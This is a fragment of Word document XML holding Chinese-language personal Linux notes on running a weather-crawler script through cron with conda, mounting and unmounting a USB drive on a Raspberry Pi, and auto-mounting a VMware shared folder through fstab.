    <w:p w14:paraId="00C5EE9A" w14:textId="77777777" w:rsidR="00861D87" w:rsidRPr="007363D3" w:rsidRDefault="00861D87" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>这条利用了上面创建的</w:t>
      </w:r>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.bash_source</w:t>
      </w:r>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445F4583" w14:textId="77777777" w:rsidR="00861D87" w:rsidRPr="007363D3" w:rsidRDefault="00861D87" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>source ~/.bash_source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA9BF1" w14:textId="77777777" w:rsidR="00861D87" w:rsidRPr="007363D3" w:rsidRDefault="00861D87" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>只有执行了上面的代码，</w:t>
      </w:r>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>命令才能被找到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3D3A53" w14:textId="77777777" w:rsidR="00861D87" w:rsidRPr="007363D3" w:rsidRDefault="00861D87" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>conda activate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F370D3" w14:textId="77777777" w:rsidR="00861D87" w:rsidRPr="007363D3" w:rsidRDefault="00861D87" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>下面就是在执行我个人需要做的任务了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3C0CFD" w14:textId="77777777" w:rsidR="00861D87" w:rsidRPr="007363D3" w:rsidRDefault="00861D87" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>cd ~/weather_crawler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CB4AE8" w14:textId="77777777" w:rsidR="00861D87" w:rsidRPr="007363D3" w:rsidRDefault="00861D87" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>下面的命令将</w:t>
      </w:r>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>main.py</w:t>
      </w:r>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>这个文件的输出重定向到日志目录里，并且使用时间戳</w:t>
      </w:r>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> "$(date +%Y-%m-%d_%T)" </w:t>
      </w:r>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>作为文件名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A47A1E6" w14:textId="17059002" w:rsidR="008C5E55" w:rsidRDefault="00861D87" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>python main.py &gt; ~/log/WeatherCrawlerLog/$(date +%Y-%m-%d_%T) 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9BCD5B" w14:textId="220A66FF" w:rsidR="008C5E55" w:rsidRDefault="008C5E55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61C6E28A" w14:textId="73DFD3EA" w:rsidR="008C5E55" w:rsidRDefault="00861D87" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后编辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定时任务：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2979D2F9" w14:textId="419F701A" w:rsidR="008C5E55" w:rsidRDefault="008C5E55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9C6087" w14:textId="4E02831A" w:rsidR="008C5E55" w:rsidRDefault="00861D87" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00861D87">
        <w:t>10 * * * * bash ~/weather_crawler/cron_job_script.bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD6CF9A" w14:textId="2A57DCBE" w:rsidR="00AF0251" w:rsidRDefault="00AF0251" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53094820" w14:textId="5F0062F6" w:rsidR="00CE12CC" w:rsidRDefault="002A5B7E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>挂载磁盘、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CCD97E" w14:textId="7541F361" w:rsidR="00CE12CC" w:rsidRDefault="00F6419E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盘所在分区：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CA57DB" w14:textId="2AFCFD57" w:rsidR="002A5B7E" w:rsidRPr="007F33FE" w:rsidRDefault="00F6419E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F33FE">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>fdisk -lu | less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4893E93E" w14:textId="7D965E98" w:rsidR="002A5B7E" w:rsidRDefault="00F6419E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我这里树莓派自己是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卡，我插入移动硬盘（两个分区，一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ventoy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盘分区），分别显示为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/dev/sda2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>/dev/sda1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254B33CE" w14:textId="77777777" w:rsidR="00F6419E" w:rsidRDefault="00F6419E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BCF1DC9" w14:textId="43DDAFB3" w:rsidR="00F6419E" w:rsidRDefault="00F6419E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>挂载命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E25E6AF" w14:textId="1AE78545" w:rsidR="002A5B7E" w:rsidRPr="007F33FE" w:rsidRDefault="00F6419E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F33FE">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/mnt# mkdir sandisk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D71D17" w14:textId="6ABBB737" w:rsidR="00F6419E" w:rsidRPr="007F33FE" w:rsidRDefault="00F6419E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F33FE">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mount /dev/sda1 /mnt/sandisk/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E1E95B" w14:textId="77777777" w:rsidR="002A5B7E" w:rsidRDefault="002A5B7E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="573BE673" w14:textId="67822418" w:rsidR="00F6419E" w:rsidRDefault="00F6419E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载命令（卸载目录而非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>硬盘）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BAD50E" w14:textId="220C6D31" w:rsidR="00F6419E" w:rsidRPr="007F33FE" w:rsidRDefault="00F6419E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F33FE">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>umount /mnt/sandisk/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772E893D" w14:textId="77777777" w:rsidR="00F6419E" w:rsidRDefault="00F6419E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE00296" w14:textId="77777777" w:rsidR="009222EB" w:rsidRDefault="009222EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果卸载失败，说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>硬盘正忙：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DD567C" w14:textId="6B46E667" w:rsidR="009222EB" w:rsidRPr="009222EB" w:rsidRDefault="009222EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009222EB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fuser -m -u /dev/s</w:t>
      </w:r>
      <w:r w:rsidR="009A32D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>da</w:t>
      </w:r>
      <w:r w:rsidR="009A32D9">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D623BC" w14:textId="77777777" w:rsidR="009222EB" w:rsidRDefault="009222EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看什么进程在占用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABC3192" w14:textId="77777777" w:rsidR="009222EB" w:rsidRDefault="009222EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09489733" w14:textId="522FA36F" w:rsidR="002A5B7E" w:rsidRDefault="009222EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掉该进程即可</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB9D5BC" w14:textId="3D9A8CA4" w:rsidR="00F6419E" w:rsidRDefault="008D3EF8" w:rsidP="008D3EF8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mware </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>挂载共享目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155DF978" w14:textId="0DC97FC3" w:rsidR="008D3EF8" w:rsidRDefault="008D3EF8" w:rsidP="008D3EF8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F1F687" w14:textId="68CCCB3B" w:rsidR="008D3EF8" w:rsidRDefault="008D3EF8" w:rsidP="008D3EF8">
      <w:r w:rsidRPr="008D3EF8">
        <w:t>https://www.cnblogs.com/MaRcOGO/p/16463460.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062A12BE" w14:textId="77777777" w:rsidR="008D3EF8" w:rsidRDefault="008D3EF8" w:rsidP="008D3EF8"/>
    <w:p w14:paraId="4AF98C40" w14:textId="04CB893E" w:rsidR="008A2AB6" w:rsidRPr="008A2AB6" w:rsidRDefault="008A2AB6" w:rsidP="008D3EF8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A2AB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>前提：需要</w:t>
      </w:r>
      <w:r w:rsidRPr="008A2AB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vmware</w:t>
      </w:r>
      <w:r w:rsidRPr="008A2AB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>提前安装好</w:t>
      </w:r>
      <w:r w:rsidRPr="008A2AB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vm</w:t>
      </w:r>
      <w:r w:rsidRPr="008A2AB6">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FD295E" w14:textId="77777777" w:rsidR="008A2AB6" w:rsidRDefault="008A2AB6" w:rsidP="008D3EF8"/>
    <w:p w14:paraId="2D3FD36D" w14:textId="57EEF0DC" w:rsidR="008D3EF8" w:rsidRDefault="008D3EF8" w:rsidP="008D3EF8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vmware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的虚拟机设置中，开启共享目录，成功启用后，使用命令可以看到设置的共享目录的名字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C16DE0C" w14:textId="2E32D242" w:rsidR="008D3EF8" w:rsidRPr="008D3EF8" w:rsidRDefault="008D3EF8" w:rsidP="008D3EF8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3EF8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vmware-hgfsclient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720122DD" w14:textId="43D52361" w:rsidR="008D3EF8" w:rsidRPr="008D3EF8" w:rsidRDefault="008D3EF8" w:rsidP="008D3EF8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建挂载目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39233A18" w14:textId="244E8462" w:rsidR="00F6419E" w:rsidRPr="008D3EF8" w:rsidRDefault="008D3EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3EF8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mkdir /mnt/hgfs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D070D3" w14:textId="77777777" w:rsidR="008D3EF8" w:rsidRDefault="008D3EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30D70DD0" w14:textId="5FA58A30" w:rsidR="008D3EF8" w:rsidRDefault="008D3EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>手动挂载（</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>此处的</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EF8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>share</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>取决于你</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> vmware</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EF8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-hgfsclient</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>显示的名字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CADC69D" w14:textId="6642EDF1" w:rsidR="008D3EF8" w:rsidRPr="008D3EF8" w:rsidRDefault="008D3EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3EF8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vmhgfs-fuse .host:/VM</w:t>
      </w:r>
      <w:r w:rsidR="00CC3FEA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EF8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>share /mnt/hgfs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C812CEA" w14:textId="1B16AFF6" w:rsidR="008D3EF8" w:rsidRDefault="008D3EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>永久性自动挂载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E4A3F5" w14:textId="46A80371" w:rsidR="008D3EF8" w:rsidRDefault="008D3EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008D3EF8">
        <w:t>cp /etc/fstab /etc/fstab.bak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B549BBB" w14:textId="6C732759" w:rsidR="008D3EF8" w:rsidRDefault="008D3EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008D3EF8">
        <w:t>vim /etc/fstab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEE493D" w14:textId="7DDE8371" w:rsidR="008D3EF8" w:rsidRDefault="008D3EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>末尾插入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353F83CB" w14:textId="4D9EF5A7" w:rsidR="008D3EF8" w:rsidRPr="008D3EF8" w:rsidRDefault="008D3EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3EF8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.host:/VM</w:t>
      </w:r>
      <w:r w:rsidR="00CC3FEA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EF8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>share  /mnt/hgfs   fuse.vmhgfs-fuse     allow_other,defaults</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EF8">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114EB21C" w14:textId="77777777" w:rsidR="008D3EF8" w:rsidRDefault="008D3EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D308D14" w14:textId="77777777" w:rsidR="008D3EF8" w:rsidRDefault="008D3EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
